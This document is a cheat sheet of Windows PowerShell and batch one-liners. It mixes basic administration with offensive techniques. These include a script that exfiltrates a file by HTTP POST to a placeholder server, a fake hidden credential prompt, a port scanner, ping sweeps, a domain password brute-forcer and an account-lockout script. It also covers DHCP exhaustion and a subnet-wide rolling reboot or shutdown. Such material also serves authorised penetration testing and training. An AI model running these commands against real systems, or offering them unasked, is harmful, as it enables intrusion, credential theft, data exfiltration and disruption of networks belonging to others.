Table Of Contents
- Windows Scripting
- PowerShell Scripting
- Powershell Basics
- Powershell OneLiners
- Windows Batch Scripting
- Batch Scripts
Windows Scripting
- Note: This section details various PowerShell and Batch script examples. Some of these examples enumerate system information, cause system effects, or aid with the discovery of sensitive information.
POWERSHELL BASICS
Stops recording
Stop-Transcript
Displays file contents
Get-Content <FILE_PATH>
Shows examples of <command>
Get-Help <COMMAND> -Examples
Searches for command string
Get-Command *<STRING_TO_SEARCH>*
Displays services (stop-service, start-service)
Get-Service
Displays services, but takes alternate credentials
Get-WmiObject -Class win32_service
Display PowerShell version
$psVersionTable
Run PowerShell 2.0 from 3.0
powershell -version 2.0
Returns # of services
Get-Service | measure-object
Displays drives in the current session
get-psdrive
Returns only process names
Get-Process | select -expandproperty name
Cmdlets that take creds
get-help * -parameter credential
Available WMI network commands
get-wmiobject -list *network
DNS Lookup
[Net.DNS]::GetHostEntry("<IP_ADDRESS>")
POWERSHELL ONELINERS
Launch file with PowerShell
powershell -ep bypass -nop -File <FILE_PATH>
TCP port connection (scanner) -- (Change <PORT>’s to match desired ports to scan, and replace IP)
$ports=(<PORT>,<PORT>,<PORT>);$ip="<IP_ADDRESS>";foreach ($port in $ports){try{$socket=New-object System.Net.Sockets.TCPClient($ip,$port);}catch{};if ($socket –eq $NULL){echo $ip":"$port" – Closed";}else{echo $ip":"$port" – Open";$socket = $NULL;}}
Ping with 500 millisecond timeout
$ping = New-Object System.Net.Networkinformation.ping;$ping.Send("<IP_ADDRESS>",500)
Basic authentication popup
powershell –WindowStyle Hidden –ExecutionPolicy Bypass $Host.UI.PromptForCredential("<WINDOW_TITLE>","<MESSAGE>","<USERNAME>","<DOMAIN>")
Run FILE every 4 hours between Aug 8-11, 2022 and the hours of 0800-1700 (from Cmd.exe)
powershell –Command "do {if ((Get-Date –format YYYYMMDD-HHMM) –match ‘202208(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]’){Start-Process –WindowStyle Hidden "<FILE_PATH>";Start-Sleep –s 14400}}while(1)"
PowerShell runas
$password = convertto-securestring –string "<PASSWORD>" –asplaintext –force;
$pp = new-object –typename System.Management.Automation.PSCredential –argumentlist "<DOMAIN>\<USERNAME>", $pw;
Start-Process powershell –Credential $pp –ArgumentList ‘-noprofile –command &{Start-Process <FILE_PATH> -verb runas}’
Email sender
Send-MailMessage –to "<EMAIL>" –from "<EMAIL>" –subject "<SUBJECT>" –a "<FILE_ATTACHEMENT>" –body "<BODY>" –SmtpServer "<IP_ADDRESS>" -Port "<PORT>" -Credential "<PS_CRED_OBJECT>" -UseSsl
PowerShell file download from specified URL
powershell –noprofile –noninteractive –Command 'Invoke-WebRequest -Uri "https://<URL>" -OutFile <FILE_PATH>'
PowerShell data exfil
# Script will send a file ($filepath) via http to server ($server) via POST request. Must have web server listening on port designated in the $server
powershell –noprofile –noninteractive –command ‘[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://<URL>"""; $filepath="""<FILE_PATH> """; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);’
Export OS info into CSV file
Get-WmiObject -class win32_operatingsystem | select -property * | export-csv <FILE_PATH>
List running services
Get-Service | where {$_.status -eq "Running"}
PowerShell Netstat Equivalent
[System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpConnections()
Persistent PSDrive to remote file share
New-PSDrive -Persist -PSProvider FileSystem -Root \\<IP_ADDRESS>\<SHARE_FOLDER> -Name i
Return files with write date past 8/20
Get-ChildItem -Path <FILE_PATH> -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
Turn on PowerShell remoting
Powershell -Command 'Enable-PSRemoting -Force’
BATCH SCRIPTS
- Note: If executing script from a batch file, variables must be preceded with %(for a total of 2 %’s).
Nested for loop ping sweep
for /L %i in (10,1,254) do @ (for /L %x in (10,1,254) do @ ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> live.txt)
Loop through each line in a file
for /F "tokens=*" %%A in (<FILE_PATH>) do echo %%A
Domain brute forcer
for /F %%N in (users.txt) do for /F %%P in (passwords.txt) do net use \\<IP_ADDRESS>\IPC$ /user:<DOMAIN> \%%N %%P 1>NUL 2>&1 && echo %%N:%%P && net use /delete \\<IP_ADDRESS>\IPC$ > NUL
Account lockout (lockout.bat)
@echo Test run:
for /F "tokens=*" %%A in (<FILE_PATH>) do net use \\<IP_ADDRESS>\c$ /USER:<DOMAIN>\%%A wrongpass
DHCP exhaustion
for /L %%P in (2,1,254) do (netsh interface ip set address name= "<INTERFACE_NAME>" static 10.0.42.%%P 255.255.255.0 <GATEWAY_IP> && ping 127.0.0.1 –n 1 –w 10000 > nul %1)
DNS reverse lookup
for /L %%P in (2,1,254) do (nslookup 10.1.11.%%P | findstr /i /c:"Name" >> dns.txt && echo HOST: 10.1.11.% %%P >> dns.txt)
Search for files beginning with the word "pass" and then print if it's a directory, file date/time, relative path, actual path and size (@variables are optional)
forfiles /P <FILE_PATH> /s /m pass* -c "cmd /c echo @isdir @fdate @ftime @relpath @path @fsize"
Simulate DNS lookups for malicious domains (useful for testing detection of AV/IDS)
:: Domains.txt should contain known malicious domains.
:: If you do not want to make a legitimate DNS request for a malicious domain then just provide your local IP in place of <DNS_SERVER_IP>.
for /F "tokens=*" %%A in (C:\Users\Administrator\Desktop\domains.txt) do nslookup %%A <DNS_SERVER_IP>
Simulated web browsing (simple traffic generation). Browse to URL’s 400 times.
for /L %%P in (2,1,401) do @for %%U in (<URL1> <URL2> <URL3>) do start /b iexplore %%U & ping -n 6 localhost & taskkill /F /IM iexplore.exe
Rolling reboot (replace /r with /s for a shutdown)
for /L %%P in (2,1,254) do shutdown /r /m \\1.1.1.%%P /f /t 0 /c "Reboot message"